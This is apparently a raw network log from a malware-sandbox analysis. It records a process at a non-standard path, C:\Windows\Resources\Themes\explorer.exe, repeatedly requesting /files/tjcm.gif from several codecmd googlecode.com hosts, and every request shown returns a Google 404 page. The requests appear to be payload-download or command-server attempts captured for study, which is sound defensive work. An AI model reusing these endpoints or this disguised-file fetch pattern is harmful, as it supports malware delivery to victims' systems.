                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:11:07.403047085 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              131192.168.2.65128364.233.184.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:11:07.982172966 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd03.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:11:08.687155962 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:11:08 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:11:08.687339067 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              132192.168.2.651284173.194.76.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:11:09.059966087 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd01.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:11:09.766017914 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:11:09 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:11:09.766037941 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              133192.168.2.651285142.251.173.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:11:10.444196939 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd02.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:11:11.143038988 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:11:11 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:11:11.143091917 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              134192.168.2.65128664.233.184.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:11:11.636904001 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd03.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:11:12.504228115 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:11:12 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:11:12.504292011 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
                                              Sep 30, 2024 16:11:12.504473925 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              135192.168.2.651287173.194.76.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:11:12.956248999 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd01.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:11:13.742454052 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:11:13 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:11:13.742474079 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              136192.168.2.651288142.251.173.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:11:14.245452881 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd02.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:11:14.963778019 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:11:14 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:11:14.963803053 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              137192.168.2.65128964.233.184.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:11:15.331346989 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd03.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:11:16.021863937 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:11:15 GMT
